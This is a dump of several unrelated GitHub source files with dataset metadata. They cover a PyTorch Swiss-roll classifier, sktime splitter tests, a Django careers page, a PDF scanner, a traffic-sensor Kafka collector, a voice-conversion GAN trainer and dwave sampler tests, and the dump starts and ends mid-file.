torch.FloatTensor(abc.transform(y_train)))\ntrain_loader = utils.DataLoader(train_set, batch_size=batch_size, shuffle=True)\n\nx_test, manifold_x_test = make_swiss_roll(n_samples=10000)\nx_test = x_test.astype(np.float32)\ny_test = (x_test[:, 0:1] >= 10).astype(np.float32)\ntest_set = utils.TensorDataset(torch.FloatTensor(x_test), torch.FloatTensor(y_test))\ntest_loader = utils.DataLoader(test_set, batch_size=batch_size, shuffle=False)\n\n\nnet = model.Net(input_size, hidden_size, num_classes)\n# print(net)\nloss_function = nn.BCELoss() \noptimizer = torch.optim.Adam(net.parameters(), lr=lr)\nall_loss = []\n\nfor epoch in range(num_epochs):\n\n    for i, (data, labels) in enumerate(train_loader):\n\n        optimizer.zero_grad()\n        outputs = net(data)\n        loss = loss_function(outputs, labels)\n        all_loss.append(loss)\n        loss.backward()\n        optimizer.step()\n\nall_loss = torch.stack(all_loss)\nall_loss = all_loss.detach().numpy()\n\nplt.plot(all_loss)\nplt.show()\n\np = []\nfor data,labels in test_loader:\n\n    output = net(data)\n    _, predicted = torch.max(output,1)\n    p.append(predicted.tolist())\n\n\ncolors_test = ['red' if label else 'blue' for label in y_test]\n\nfig = plt.figure()\nax = fig.add_subplot(1, 2, 1, projection='3d')\nax.scatter(x_test[:, 0], x_test[:, 1], x_test[:, 2], c=colors_test)\nax.set_title('origin')\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\n\ntorch.save(net.state_dict(), './results/classification_model1.pt') \nfrom functools import reduce\nimport operator\no = reduce(operator.concat, p)\ns = np.asarray(o, dtype=np.float32)\ncolors_test = ['red' if label else 'blue' for label in s]\nax = fig.add_subplot(1, 2, 2, projection='3d')\nax.scatter(x_test[:, 0], x_test[:, 1], x_test[:, 2], c=colors_test)\nax.set_title('predicted')\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\nplt.show()\n\n\n","repo_name":"divija-palleti/SwissRoll-VAE","sub_path":"SWISS_ROLL/TEST_CLASS_ROLL/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33998367820","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom sktime.forecasting.tests._config import (\n    TEST_FHS,\n    TEST_FHS_TIMEDELTA,\n    TEST_STEP_LENGTHS,\n    TEST_WINDOW_LENGTHS,\n)\nfrom sktime.split.base._common import _inputs_are_supported\nfrom sktime.split.expandingwindow import ExpandingWindowSplitter\nfrom sktime.split.singlewindow import SingleWindowSplitter\nfrom sktime.split.slidingwindow import SlidingWindowSplitter\nfrom sktime.utils._testing.hierarchical import _make_hierarchical\nfrom sktime.utils._testing.panel import _make_panel\nfrom sktime.utils._testing.series import _make_series\n\nN_TIMEPOINTS = 30\nTEST_Y_PANEL_HIERARCHICAL = [\n    _make_hierarchical((2, 2), N_TIMEPOINTS, N_TIMEPOINTS),\n    _make_panel(n_instances=2, n_timepoints=N_TIMEPOINTS),\n]\n\n\ndef test_split_series():\n    \"\"\"Tests that split_series produces series in the split.\"\"\"\n    y = _make_series()\n    cv = SlidingWindowSplitter()\n\n    for train, test in cv.split_series(y):\n        assert isinstance(train, pd.Series)\n        assert len(train) == 10\n        assert isinstance(test, pd.Series)\n        assert len(test) == 1\n\n\ndef test_split_loc():\n    \"\"\"Tests that split_loc produces loc indices for train and test.\"\"\"\n    y = _make_series()\n    cv = SlidingWindowSplitter()\n\n    for train, test in cv.split_loc(y):\n        assert isinstance(train, pd.DatetimeIndex)\n        assert len(train) == 
10\n y.loc[train]\n assert isinstance(test, pd.DatetimeIndex)\n assert len(test) == 1\n y.loc[test]\n\n\ndef test_split_series_hier():\n \"\"\"Tests that split works with hierarchical data.\"\"\"\n hierarchy_levels = (2, 4)\n n_instances = np.prod(hierarchy_levels)\n n = 12\n y = _make_hierarchical(\n hierarchy_levels=hierarchy_levels, max_timepoints=n, min_timepoints=n\n )\n cv = SlidingWindowSplitter()\n\n for train, test in cv.split(y):\n assert isinstance(train, np.ndarray)\n assert train.ndim == 1\n assert train.dtype == np.int64\n assert len(train) == 10 * n_instances\n assert isinstance(test, np.ndarray)\n assert test.ndim == 1\n assert pd.api.types.is_integer_dtype(test.dtype)\n assert len(test) == 1 * n_instances\n\n for train, test in cv.split_loc(y):\n assert isinstance(train, pd.MultiIndex)\n assert len(train) == 10 * n_instances\n assert train.isin(y.index).all()\n assert isinstance(test, pd.MultiIndex)\n assert len(test) == 1 * n_instances\n assert test.isin(y.index).all()\n\n def inst_index(y):\n return set(y.index.droplevel(-1).unique())\n\n for train, test in cv.split_series(y):\n assert isinstance(train, pd.DataFrame)\n assert len(train) == 10 * n_instances\n assert isinstance(test, pd.DataFrame)\n assert len(test) == 1 * n_instances\n assert inst_index(train) == inst_index(y)\n assert inst_index(test) == inst_index(y)\n\n\ndef test_hierarchical_singlewindowsplitter():\n \"\"\"Test broadcasting of window splitters to hierarchical data.\n\n Also certifies for failure cas in bug #4972.\n \"\"\"\n y = _make_hierarchical(hierarchy_levels=(2, 3), random_state=0)\n splitter = SingleWindowSplitter(fh=[1, 2], window_length=10)\n splits = list(splitter.split(y))\n assert len(splits) == 1, \"Should only be one split\"\n\n\n@pytest.mark.parametrize(\"CV\", [SlidingWindowSplitter, ExpandingWindowSplitter])\n@pytest.mark.parametrize(\"fh\", [*TEST_FHS, *TEST_FHS_TIMEDELTA])\n@pytest.mark.parametrize(\"window_length\", TEST_WINDOW_LENGTHS)\n@pytest.mark.parametrize(\"step_length\", TEST_STEP_LENGTHS)\ndef test_windowbase_splitter_get_n_split_hierarchical(\n CV, fh, window_length, step_length\n):\n \"\"\"Test that WindowBaseSplitter.get_n_splits works for hierarchical data.\"\"\"\n # see bugs 4971\n y = TEST_Y_PANEL_HIERARCHICAL[0] # hierarchical data\n if _inputs_are_supported([fh, window_length, step_length]):\n cv = CV(fh, window_length, step_length)\n assert cv.get_n_splits(y) == len(\n list(cv.split(y))\n ), \"get_n_splits does not equal the number of splits in the output.\"\n\n\n@pytest.mark.parametrize(\"y\", TEST_Y_PANEL_HIERARCHICAL)\n@pytest.mark.parametrize(\"CV\", [SlidingWindowSplitter, ExpandingWindowSplitter])\ndef test_windowbase_splitter_get_n_split_unequal_series(y, CV):\n y_unequal = y.copy() # avoid changing original dataset\n y_unequal.iloc[:3, :] = None # make the first series shorter than the rest\n y_unequal.dropna(inplace=True)\n cv = CV([1], 24, 1)\n assert cv.get_n_splits(y_unequal) == len(\n list(cv.split(y_unequal))\n ), \"get_n_splits does not equal the number of splits in the output.\"\n","repo_name":"sktime/sktime","sub_path":"sktime/split/base/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"10196295645","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.core.mail import EmailMessage\nimport os\nfrom dashboard.models import 
CurrentOpportunities, ApplyForThisPosition\n\n\nclass CareerView(View):\n\n    def get(self, request):\n        careers = CurrentOpportunities.objects.filter(display=True).all().order_by(\"-deadline\")\n        is_careers = CurrentOpportunities.objects.exists()\n        context = {\n            'title': \"Career\",\n            'careers': careers,\n            'is_careers' : is_careers\n        }\n        return render(request, 'career/career_page.html', context)\n\n\ndef send_career_email_to_qtec(subject, file_contents, first_name, last_name, email):\n    body = \"First Name: {} , Last Name: {}, Email: {}\".format(first_name, last_name, email)\n    from_email = 'contact.qtec@gmail.com'\n    to_email = ['qtec.careers@gmail.com']\n\n    email = EmailMessage(subject, body, from_email, to_email)\n\n    email.attach('{} cv for position {}'.format(first_name, subject), file_contents, 'application/pdf')\n    email.send()\n\n\nclass CareerDetailsView(View):\n\n    def get(self, request, slug= None):\n        career = CurrentOpportunities.objects.get(slug = slug,display=True)\n\n        context = {\n            'title': \"Career Details of {}\".format(career.title),\n            'career': career\n        }\n        return render(request, 'career/career_details.html', context)\n\n    def post(self, request, slug= None):\n        data = request.POST\n        firstname = data.get('firstname')\n        lastname = data.get('lastname')\n        careeremail = data.get('careeremail')\n        image = request.FILES.get('image')\n        career_id= data.get('career_id')\n        \n        career = CurrentOpportunities.objects.get(id = career_id)\n\n        apply_ = ApplyForThisPosition.objects.create(current_opportunities_id= career_id ,first_name= firstname, last_name= lastname, email= careeremail, upload_cv= image)\n        title = career.title\n        file_contents = apply_.upload_cv.read()\n        send_career_email_to_qtec(title, file_contents, firstname, lastname, careeremail)\n        \n        return JsonResponse({})","repo_name":"Biprajit-Karmakar/mail","sub_path":"homepage/views/career_view.py","file_name":"career_view.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25110244673","text":"#importing modules\nimport os\nimport PyPDF2\n\n#extracting files from the directory\ndir_files = os.listdir()\n\nprint(dir_files)\n\nfor files in dir_files:\n    if files.endswith('.pdf'):\n        print(f'SCANNING CONTENT OF {files}...')\n        f = open(files,'rb')\n        #creating a pdfReader object\n        pdfReader = PyPDF2.PdfFileReader(f)\n\n        #print the number of pages in the pdf\n        no_of_pages = pdfReader.numPages\n        print(f'Total no of pages in the pdf are: {no_of_pages}')\n\n        #creating another object for individual page selection \n        newPage_obj = pdfReader.getPage(0)\n\n        #extracting the content of the currently selected page\n        print('\\nSCANNING THE CONTENT OF PAGE...')\n        print(newPage_obj.extractText())","repo_name":"rohitsinghkcodes/Coding-Sessions","sub_path":"EXTRAS/Document content reading/pdfContentCheck.py","file_name":"pdfContentCheck.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13430046785","text":"import json\n\nfrom pytraffic.collectors.util import kafka_producer, scraper, files, date_time\n\n\nclass BtSensors(object):\n    \"\"\"\n    This combines everything bluetooth sensors related. On init it loads sensors\n    data or fetches it from the web if it’s older than one day. 
One can use the run\n    method to send data to Kafka or the plot method to draw a map of\n    sensor locations.\n    \"\"\"\n\n    def __init__(self, conf):\n        \"\"\"\n        Initialize Kafka producer and web scraper classes. Also load bluetooth\n        data.\n\n        Args:\n            conf (dict): This dict contains all configurations.\n\n        \"\"\"\n        self.conf = conf['bt_sensors']\n        self.producer = kafka_producer.Producer(conf['kafka_host'],\n                                                self.conf['kafka_topic'])\n\n        self.w_scraper = scraper.Scraper(\n            conf['scraper'],\n            auth=(self.conf['timon_username'], self.conf['timon_password']),\n            verify=self.conf['timon_crt_file'])\n\n        self.not_lj = self.conf['not_lj']\n\n        self.img_dir = conf['data_dir'] + self.conf['img_dir']\n        self.sensors_data_file = conf['data_dir'] + self.conf['data_file']\n        self.sensors_data = None\n\n    def get_web_data(self):\n        \"\"\"\n        This requests bluetooth data from the source url and makes a local copy of\n        it.\n        \"\"\"\n        self.sensors_data = self.w_scraper.get_json(self.conf['sensors_url'])\n        if self.sensors_data is not None:\n            files.make_dir(self.sensors_data_file)\n            with open(self.sensors_data_file, 'w') as outfile:\n                json.dump(self.sensors_data, outfile)\n            self.sensors_data = self.sensors_data['data']\n        else:\n            self.get_local_data()\n\n    def get_local_data(self):\n        \"\"\"\n        This loads the local copy of bluetooth sensors data.\n        \"\"\"\n        with open(self.sensors_data_file) as data_file:\n            self.sensors_data = json.load(data_file)['data']\n\n    def load_data(self):\n        \"\"\"\n        We check if we have a not too old local copy of bluetooth sensors data.\n        If yes, we load it from the local file; if not, we fetch the data from the source\n        url and then create a local copy.\n        \"\"\"\n        if files.old_or_not_exists(self.sensors_data_file,\n                                   self.conf['data_age']):\n            self.get_web_data()\n        else:\n            self.get_local_data()\n\n    def run(self):\n        \"\"\"\n        This scrapes data from the source url. 
It then modifies its structure and\n        forwards it to Kafka.\n        \"\"\"\n        data = self.w_scraper.get_json(self.conf['last_url'])\n        for dist in data['data']:\n            if dist['toBtId'] not in self.not_lj and \\\n                    dist['fromBtId'] not in self.not_lj:\n\n                sensor_from = next(s for s in self.sensors_data if\n                                   s[\"btId\"] == dist['fromBtId'])\n\n                sensor_to = next(s for s in self.sensors_data if\n                                 s[\"btId\"] == dist['toBtId'])\n\n                dist['fromBtLng'] = sensor_from['loc']['lng']\n                dist['fromBtLat'] = sensor_from['loc']['lat']\n                dist['toBtLng'] = sensor_to['loc']['lng']\n                dist['toBtLat'] = sensor_to['loc']['lat']\n\n                dist['distance'] = next(s for s in sensor_from['neighbours'] if\n                                        s[\"btId\"] == dist['toBtId'])['distance']\n\n                dist['timestampTo'] = date_time.isoformat_to_utc(\n                    dist['timestampTo'])\n                dist['timestampFrom'] = date_time.isoformat_to_utc(\n                    dist['timestampFrom'])\n\n                self.producer.send(dist)\n        self.producer.flush()\n\n    def get_plot_data(self):\n        \"\"\"\n        This function prepares coordinates and labels for plotting.\n\n        Returns:\n            lng Longitude part of points coordinates.\n            lat Latitude part of points coordinates.\n            labels Points labels.\n\n        \"\"\"\n        labels = []\n        lng = []\n        lat = []\n        for point in self.sensors_data:\n            if point['btId'] not in self.not_lj:\n                labels.append(point['btId'])\n                lng.append(point['loc']['lng'])\n                lat.append(point['loc']['lat'])\n        return lng, lat, labels\n\n    def plot_map(self, title, figsize, dpi, zoom, markersize, lableoffset,\n                 fontsize, file_name):\n        \"\"\"\n        This function creates a map of the bluetooth sensor locations.\n\n        Args:\n            title (str): Plot title.\n            figsize (tuple of int): Figure size.\n            dpi (int): Dots per inch.\n            zoom (int): Map zoom.\n            markersize (int): Size of dots.\n            lableoffset (tuple of float): Offset of labels from dots.\n            fontsize (int): Size of labels.\n            file_name (str): Name of saved file.\n\n        \"\"\"\n        # This import is here so the main collector is not dependent on plot\n        # requirements.\n        from pytraffic.collectors.util import plot\n\n        lng, lat, labels = self.get_plot_data()\n\n        map_plot = plot.PlotOnMap(lng, lat, title)  # lng, lat, 'BT v Ljubljani'\n        map_plot.generate(figsize, dpi, zoom, markersize)  # (18, 18), 400, 14, 5\n        map_plot.label(labels, lableoffset, fontsize)  # labels, (0.001, 0.0005), 10\n        map_plot.save(self.img_dir, file_name)  # 'bt_lj.png'\n","repo_name":"xlab-si/DICE-BigData-Traffic","sub_path":"python_package/pytraffic/collectors/bt_sensors.py","file_name":"bt_sensors.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14808456756","text":"\"\"\"\nRequirements\n1. Use a list to create the dictionary's key list.\n The keys are name, age, hobby and dream.\n2. Use the created list to store values in the dictionary.\n3. 
Print the values stored in the dictionary in the format below.\nExpected result\n--Input section--\nname >> Hong Gildong\nage >> 23\nhobby >> watching movies\ndream >> developer\n--Output section--\nname : Hong Gildong\nage : 23\nhobby : watching movies\ndream : developer\n\"\"\"\ndic = {}\nlst = [\"name\",\"age\",\"hobby\",\"dream\"]\nindex = 0\nprint(\"--Input section--\")\nwhile index < len(lst):\n    dic[lst[index]] = input(lst[index]+\" >> \")\n    index += 1\n\nindex = 0\nprint(\"--Output section--\")\nwhile index < len(lst):\n    print(\"%s \\t : %s\"%(lst[index],dic[lst[index]]))\n    index += 1\n\n\"\"\"\nVariable naming conventions\n1) Underscore style - '_' takes the place of a space.\nex) my_info = {}\n\n2) Camel case - distinguishes the kind of a value by a fixed rule.\n- Whenever a new word starts, its first letter is capitalized.\n- Variables start lowercase / constant-like names use only uppercase, etc.\n- The style is named after the shape of a camel's back.\nex) myInfo = {}\n\"\"\"\nprint(\"----- Another approach -----\")\nmyInfo = {}\nitems = [\"name\",\"age\",\"hobby\",\"dream\"]\nindex = 0\nwhile index < len(items):\n    myInfo[items[index]] = input(items[index]+\" >> \")\n    index += 1\nindex = 0\nwhile index < len(items):\n    print(items[index] + \"\\t:\", myInfo[items[index]])\n    index += 1\n","repo_name":"LeeBG/PythonStudy","sub_path":"day14/10.딕셔너리EX3.py","file_name":"10.딕셔너리EX3.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14808456756","text":"import numpy as np\n\n\n\nclass Photo:\n    def __init__(self, p_id, pos, noft, tags):\n        self.noftag = noft\n        self.id = p_id\n        self.pos = pos\n        self.tags = set(tags)\n        self.visit = False\n\n\ndef loadInputs(file_name):\n    f = open(file_name)\n    text = f.readlines()\n    f.close()\n    N = int(text[0])\n    text.pop(0)\n    horizontal = list([])\n    verticals = []\n    for i in range(N):\n        row = text[i].split()\n        p = Photo(i, row[0], row[1], row[2:])\n        if row[0] == 'V':\n            verticals.append(p)\n        else:\n            horizontal.append(p)\n    np.random.shuffle(verticals)\n    res = list([])\n    # pair up vertical photos two at a time; an unpaired leftover vertical is dropped\n    while len(verticals) >= 2:\n        temp1 = verticals[0]\n        temp2 = verticals[1]\n        verticals.pop(0)\n        verticals.pop(0)\n        temp1.id = (temp1.id, temp2.id)\n        temp1.tags = set(temp1.tags|temp2.tags)\n        temp1.noftag = len(temp1.tags)\n        res.append(temp1)\n    res += horizontal\n    np.random.shuffle(res)\n    return res\n\n\ndef minPic(p1, p2):\n    common = len(p1.tags & p2.tags)\n    aDiff = len(p1.tags) - common\n    bDiff = len(p2.tags) - common\n    return min(common, aDiff, bDiff)\n\n\ndef createSlideShow(arr):\n    # x = int(np.math.log(len(arr)))\n    x = int(np.sqrt(len(arr)))\n    if x < 100:\n        x = 100\n    slide = list([])\n    sum = 0\n    elem = arr[0]\n    slide.append(elem)\n    arr.pop(0)\n    while len(arr) != 0:\n        elem = slide[-1]\n        maxIp = 0\n        maxNum = 0\n        endIn = min(x, len(arr))\n        for i in range(0, endIn):\n            temp = minPic(elem, arr[i])\n            if (temp > maxNum):\n                maxNum = temp\n                maxIp = i\n        slide.append(arr[maxIp])\n        arr.pop(maxIp)\n        sum += maxNum\n\n    return slide, sum\n\n\ndef printToOutput(photos):\n    f = open(\"output.txt\", \"w\")\n    f.write(str(len(photos))+\"\\n\")\n    for photo in photos:\n        # horizontal photos carry a single id, paired verticals a tuple of ids\n        ids = photo.id if isinstance(photo.id, tuple) else (photo.id,)\n        f.write(' '.join(str(i) for i in ids)+\"\\n\")\n    f.close()\n\n\nif __name__ == \"__main__\":\n    files = [ 'a_example.txt']\n    for fileFullName in files:\n        pic = loadInputs(fileFullName)\n        slide, sumSlide = createSlideShow(pic)\n        print(\"slide: \", [elem.tags for elem in slide], \"sum: \", sumSlide)\n","repo_name":"Galit1321/HC-shecodes","sub_path":"Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40488861871","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torch.nn.utils import clip_grad_norm_\nimport numpy as np\nimport warnings\nimport argparse\nfrom tqdm.auto 
import tqdm\nimport wandb\nfrom pathlib import Path\n\nfrom src.model import HiFiVC\nfrom src.utils import read_json\nfrom src.dataset.dataset import VCDataset, collate_fn\nfrom src.loss.HiFiLoss import GeneratorLoss, DescriminatorLoss\n\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\nMAX_NORM = 5\n\n@torch.no_grad()\ndef get_grad_norm(model, norm_type=2):\n parameters = model.parameters()\n if isinstance(parameters, torch.Tensor):\n parameters = [parameters]\n parameters = [p for p in parameters if p.grad is not None]\n total_norm = torch.norm(\n torch.stack(\n [torch.norm(p.grad.detach(), norm_type).cpu() for p in parameters]\n ),\n norm_type,\n )\n return total_norm.item()\n\n\ndef train(args):\n config = read_json(args.config)\n\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n \n model = HiFiVC(device, **config)\n model.to(device)\n dataset = VCDataset(data_path=args.data_path, part='train',\n max_audio_length=config['max_audio_length'],\n limit=config.get('limit', None))\n dataloader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, collate_fn=collate_fn)\n\n weight_decay = config['weight_decay']\n betas = config['betas']\n lr = config['lr']\n \n D_optimizer = torch.optim.AdamW(model.descriminator.parameters(), lr=lr, \n weight_decay=weight_decay, betas=betas)\n\n #G_params = list(model.generator.parameters()) + list(model.FModel.parameters()) +\\\n # list(model.speaker_proj.parameters())\n\n #G_params = list(model.generator.parameters()) + list(model.FModel.parameters())\n G_params = list(model.generator.parameters()) + list(model.speaker_encoder.parameters())\n #G_params = list(model.generator.parameters())\n \n G_optimizer = torch.optim.AdamW(G_params, lr=lr, \n weight_decay=weight_decay, betas=betas)\n D_scheduler = torch.optim.lr_scheduler.ExponentialLR(D_optimizer, gamma=0.999)\n G_scheduler = torch.optim.lr_scheduler.ExponentialLR(G_optimizer, gamma=0.999)\n\n descriminator_criterion = DescriminatorLoss()\n generator_criterion = GeneratorLoss()\n\n descriminator_criterion.to(device)\n generator_criterion.to(device)\n\n log_step = 50\n\n save_path = Path(args.save_path)\n save_path.mkdir(parents=True, exist_ok=True)\n\n step = 0\n\n model.train()\n model.AsrModel.eval()\n\n for epoch in range(args.n_epochs):\n print(f'Epoch: {epoch}')\n progress_bar = tqdm(dataloader)\n for i, batch in enumerate(progress_bar):\n batch['mel_spec'] = batch['mel_spec'].to(device)\n batch['real_audio'] = batch['real_audio'].to(device)\n batch['source_audio'] = batch['source_audio'].to(device)\n #batch['f0'] = batch['f0'].to(device)\n batch['audio_length'] = batch['audio_length'].to(device)\n\n g_outputs = model(**batch)\n batch.update(g_outputs)\n\n D_optimizer.zero_grad()\n\n d_outputs = model.descriminate(generated_audio=batch[\"generated_audio\"].detach(),\n real_audio=batch[\"real_audio\"])\n batch.update(d_outputs)\n\n D_loss = descriminator_criterion(**batch)\n D_loss.backward()\n clip_grad_norm_(model.descriminator.parameters(), MAX_NORM)\n\n if i % log_step == 0:\n wandb.log({\"D_loss\": D_loss.item(),\n \"D_grad\": get_grad_norm(model.descriminator)}, step=step)\n print(f\"D_loss: {D_loss.item()}\")\n\n D_optimizer.step()\n\n G_optimizer.zero_grad()\n d_outputs = model.descriminate(**batch)\n batch.update(d_outputs)\n G_loss, adv_loss, 
fm_loss, mel_loss, kl_loss = generator_criterion(**batch)\n\n            G_loss.backward()\n            clip_grad_norm_(model.generator.parameters(), MAX_NORM)\n            clip_grad_norm_(model.speaker_encoder.parameters(), MAX_NORM)\n            if i % log_step == 0:\n                wandb.log({\n                    \"G_loss\": G_loss.item(),\n                    \"adv_loss\": adv_loss.item(),\n                    \"fm_loss\": fm_loss.item(),\n                    \"mel_loss\": mel_loss.item(),\n                    \"kl_loss\": kl_loss.item(),\n                    \"G_grad\": get_grad_norm(model.generator),\n                    \"VAE_grad\": get_grad_norm(model.speaker_encoder)\n                },step=step)\n                generated_audio = batch['generated_audio'][0].detach().cpu().numpy().T\n                real_audio = batch['real_audio'][0].detach().cpu().numpy().T\n                wandb.log({\n                    'step_generated_audio': wandb.Audio(generated_audio, sample_rate=24000),\n                    'step_real_audio': wandb.Audio(real_audio, sample_rate=24000)\n                }, step=step)\n\n                print(f\"G_loss: {G_loss.item()}\")\n\n            G_optimizer.step()\n\n            D_scheduler.step()\n            G_scheduler.step()\n            step += 1\n        torch.save(model.state_dict(), str(save_path / 'model.pth'),\n                   _use_new_zipfile_serialization=False)\n        generated_audio = batch['generated_audio'][0].detach().cpu().numpy().T\n        real_audio = batch['real_audio'][0].detach().cpu().numpy().T\n        wandb.log({\n            'generated_audio': wandb.Audio(generated_audio, sample_rate=24000),\n            'real_audio': wandb.Audio(real_audio, sample_rate=24000)\n        }, step=step)\n    \n\nif __name__ == '__main__':\n    args = argparse.ArgumentParser(description=\"PyTorch Template\")\n    args.add_argument(\n        \"-c\",\n        \"--config\",\n        default=\"config.json\",\n        type=str,\n        help=\"config file path (default: config.json)\",\n    )\n    args.add_argument(\n        \"-d\",\n        \"--data_path\",\n        default=None,\n        type=str,\n        help=\"data path (default: None)\",\n    )\n    args.add_argument(\n        \"-s\",\n        \"--save_path\",\n        default='saved',\n        type=str,\n        help=\"save path (default: saved)\",\n    )\n    args.add_argument(\n        \"-n\",\n        \"--n_epochs\",\n        default=120,\n        type=int,\n        help=\"number of epochs (default: 120)\",\n    )\n    args.add_argument(\n        \"-b\",\n        \"--batch_size\",\n        default=20,\n        type=int,\n        help=\"batch_size (default: 20)\",\n    )\n    args.add_argument(\n        \"--num_workers\",\n        default=2,\n        type=int,\n        help=\"number of workers (default: 2)\",\n    )\n\n    args = args.parse_args()\n\n    with wandb.init(\n            project=\"HiFiVC\",\n            name=\"norm_real_train\"):\n        train(args)","repo_name":"Blinorot/HiFiVC","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42679829117","text":"import unittest\nimport numpy as np\nimport copy\nimport itertools\nimport warnings\n\nimport dimod\n\nimport dwave.samplers.sa as sa\nfrom dwave.samplers.sa import SimulatedAnnealingSampler\n\nclass TestTimingInfo(unittest.TestCase):\n    def setUp(self) -> None:\n        empty = dimod.BQM(dimod.SPIN)\n        one = dimod.BQM.from_ising({\"a\": 1}, {})\n        two = dimod.BQM.from_ising({}, {(\"abc\", (1, 2)): -1})\n\n        sampler = SimulatedAnnealingSampler()\n        rng = np.random.default_rng(48448418563)\n\n        self.sample_sets = []\n        for bqm in [empty, one, two]:\n            sample_set = sampler.sample(bqm, seed=rng.integers(2**30))\n            self.sample_sets.append(sample_set)\n\n        self.timing_keys = {\"preprocessing_ns\", \"postprocessing_ns\", \"sampling_ns\"}\n\n    def test_keys_exist(self):\n        for sample_set in self.sample_sets:\n            with self.subTest(ss=sample_set):\n                self.timing_keys.issubset(sample_set.info['timing'])\n\n    def test_strictly_positive_timings(self):\n        for sample_set in self.sample_sets:\n            for category, duration in 
sample_set.info['timing'].items():\n                self.assertGreater(duration, 0)\n\n\nclass TestSchedules(unittest.TestCase):\n    def test_schedules(self):\n        sampler = SimulatedAnnealingSampler()\n        num_vars = 40\n        h = {v: -1 for v in range(num_vars)}\n        J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n        num_reads = 10\n        for schedule_type in ['geometric', 'linear']:\n            resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type=schedule_type)\n\n            row, col = resp.record.sample.shape\n\n            self.assertEqual(row, num_reads)\n            self.assertEqual(col, num_vars) # should get back all of the variables\n            self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n            with self.assertRaises(ValueError):\n                # Should not accept schedule:\n                resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type=schedule_type, beta_schedule=[-1,1])\n        with self.assertRaises(ValueError):\n            sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='asd')\n\n    def test_custom_schedule(self):\n        sampler = SimulatedAnnealingSampler()\n        num_vars = 40\n        h = {v: -1 for v in range(num_vars)}\n        J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n        num_reads = 1\n        with self.assertRaises(ValueError):\n            resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom')\n        with self.assertRaises(ValueError):\n            # Positivity\n            resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom', beta_schedule=[-1,1])\n        with self.assertRaises(ValueError):\n            # numeric\n            resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom', beta_schedule=['asd',1])\n\n        resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom', beta_schedule=[0.1,1])\n\nclass TestSimulatedAnnealingSampler(unittest.TestCase):\n\n    def test_instantiation(self):\n        sampler = SimulatedAnnealingSampler()\n        dimod.testing.assert_sampler_api(sampler)\n\n    def test_one_node_beta_range(self):\n        h = {'a': -1}\n        bqm = dimod.BinaryQuadraticModel(h, {}, 0, dimod.SPIN)\n        response = SimulatedAnnealingSampler().sample(bqm)\n        hot_beta, cold_beta = response.info['beta_range']\n\n        # Check beta values\n        # Note: beta is proportional to 1/temperature, therefore hot_beta < cold_beta\n        self.assertLess(hot_beta, cold_beta)\n        self.assertNotEqual(hot_beta, float(\"inf\"), \"Starting value of 'beta_range' is infinite\")\n        self.assertNotEqual(cold_beta, float(\"inf\"), \"Final value of 'beta_range' is infinite\")\n\n    def test_one_edge_beta_range(self):\n        J = {('a', 'b'): 1}\n        bqm = dimod.BinaryQuadraticModel({}, J, 0, dimod.BINARY)\n        response = SimulatedAnnealingSampler().sample(bqm)\n        hot_beta, cold_beta = response.info['beta_range']\n\n        # Check beta values\n        # Note: beta is proportional to 1/temperature, therefore hot_beta < cold_beta\n        self.assertLess(hot_beta, cold_beta)\n        self.assertNotEqual(hot_beta, float(\"inf\"), \"Starting value of 'beta_range' is infinite\")\n        self.assertNotEqual(cold_beta, float(\"inf\"), \"Final value of 'beta_range' is infinite\")\n\n    def test_sample_ising(self):\n        h = {'a': 0, 'b': -1}\n        J = {('a', 'b'): -1}\n\n        resp = SimulatedAnnealingSampler().sample_ising(h, J)\n\n        row, col = resp.record.sample.shape\n\n        self.assertEqual(col, 2) # should get back two variables\n        self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n\n    def test_sample_qubo(self):\n        Q = {(0, 1): 1}\n        resp = SimulatedAnnealingSampler().sample_qubo(Q)\n\n        row, col = resp.record.sample.shape\n\n        self.assertEqual(col, 2) # should get back two variables\n        
